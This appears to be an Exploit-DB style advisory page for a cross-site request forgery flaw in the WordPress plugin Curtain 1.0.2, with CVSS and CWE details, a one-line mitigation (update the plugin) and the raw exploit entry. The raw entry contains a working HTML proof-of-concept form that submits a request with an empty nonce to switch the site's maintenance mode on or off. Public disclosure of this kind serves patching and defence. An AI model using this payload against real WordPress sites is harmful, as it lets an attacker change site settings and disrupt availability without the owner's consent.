header-logo
Suggest Exploit
vendor:
Curtain
by:
Hassan Khan Yusufzai - Splint3r7
8.8
CVSS
HIGH
Cross-site Request Forgery (CSRF)
352
CWE
Product Name: Curtain
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: Yes
Related CWE:
CPE: 2.3:a:wordpress:curtain:1.0.2:*:*:*:*:*:*:*
Metasploit:
Other Scripts:
Platforms Tested: Firefox
2022

WordPress Plugin Curtain 1.0.2 โ€“ Cross-site Request Forgery (CSRF)

Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode.

Mitigation:

The vulnerability can be mitigated by updating the plugin to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/curtain/
# Version: 1.0.2
# Tested on: Firefox

## Summary:

Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode.

## Vulnerable URL:

http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0

## CSRF POC Exploit

```
<html>
  <body>
    <form action="http://localhost:10003/wp-admin/options-general.php">
      <input type="hidden" name="page" value="curtain" />
      <input type="hidden" name="&#95;wpnonce" value="" />
      <input type="hidden" name="mode" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
cqrsecured